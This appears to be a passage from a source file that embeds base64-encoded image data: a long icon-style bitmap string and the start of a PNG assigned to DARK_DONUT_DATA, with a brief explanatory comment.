AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGAJQAcgDpAHIA6QByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsAfgBwAOYAcgDpAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAA8AGcA0wByAOkAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAEsAaADVAHIA6QByAOkAcgDpAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABLAJ8AcgDoAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0ARQBhAMkAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACsAYABbALwAbgDhAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAHwA6AH0AbQDfAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAALQBFAJMAYgDLAHAA5QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATADIAOQB7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA///////////////gAAH/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAD////////////////AAAAAA//////////////8AAAAAAA/////////////4AAAAAAAB////////////wAAAAAAAAD///////////gAAAAAAAAAH//////////gAAAAAAAAAAf/////////gAAAAAAAAAAB/////////gAAAAAAAAAAAH////////gAAAAAAAAAAAAf///////gAAAAAAAAAAAAB///////wAAAAAAAAAAAAAP//////wAAAAAAAAAAAAAA//////4AAAAAAAAAAAAAAH/////4AAAAAAAAAAAAAAAf////8AAAAAAAAAAAAAAAD////+AAAAAAAAAAAAAAAAf////AAAAAAAAAAAAAAAAD////gAAAAAAAAAAAAAAAAf///wAAAAAAAAAAAAAAAAD///4AAAAAAAAAAAAAAAAAf//8AAAAAAAAAAAAAAAAAD//+AAAAAAAAAAAAAAAAAAf//AAAAAAAAAAAAAAAAAAD//gAAAAAAAAAAAAAAAAAAf/4AAAAAAAAAAAAAAAAAAD/8AAAAAAAAAAAAAAAAAAA/+AAAAAAAAAAAAAAAAAAAH/gAAAAAAAAAAAAAAAAAAA/wAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAB+AAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAA8AAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/4AAAAAAAAAAAAAAAAAAP//8AAAAAAAAAAAAAAAAAf/
//4AAAAAAAAAAAAAAAAf////wAAAAAAAAAAAAAAAf/////AAAAAAAAAAAAAAAf/////4AAAAAAAAAAAAAAP//////AAAAAAAAAAAAAAH//////4AAAAAAAAAAAAAB///////AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAP//////8AAAAAAAAAAAAAD///////AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAP//////8AAAAAAAAAAAAAB//////+AAAAAAAAAAAAAAP//////gAAAAAAAAAAAAAB//////wAAAAAACAAAAAAAP/////4AAAAAAAgAAAAAAB/////4AAAAAAAYAAAAAAAH////4AAAAAAAHAAAAAAAAP///4AAAAAAADwAAAAAAAAf//gAAAAAAAA+AAAAAAAAAAAAAAAAAAAAfwAAAAAAAAAAAAAAAAAAAH8AAAAAAAAAAAAAAAAAAAD/gAAAAAAAAAAAAAAAAAAB/8AAAAAAAAAAAAAAAAAAAf/gAAAAAAAAAAAAAAAAAAP/4AAAAAAAAAAAAAAAAAAH//AAAAAAAAAAAAAAAAAAD//4AAAAAAAAAAAAAAAAAB///AAAAAAAAAAAAAAAAAA///4AAAAAAAAAAAAAAAAAf///gAAAAAAAAAAAAAAAAP///8AAAAAAAAAAAAAAAAH////gAAAAAAAAAAAAAAAH////+AAAAAAAAAAAAAAAD/////wAAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAB//////4AAAAAAAAAAAAAB///////gAAAAAAAAAAAAB///////+AAAAAAAAAAAAB////////8AAAAAAAAAAAB/////////wAAAAAAAAAAD//////////gAAAAAAAAAH///////////AAAAAAAAAP///////////+AAAAAAAAf/////////////AAAAAAD///////////////wAAAAf////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8='
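# NOTE (editorial, assumed): the blob below appears to be a base64-encoded PNG
# ("iVBORw0KGgo" is the base64 form of the PNG file signature), presumably a
# dark-theme variant of the donut image embedded as a bytes literal.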
DARK_DONUT_DATA = b'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
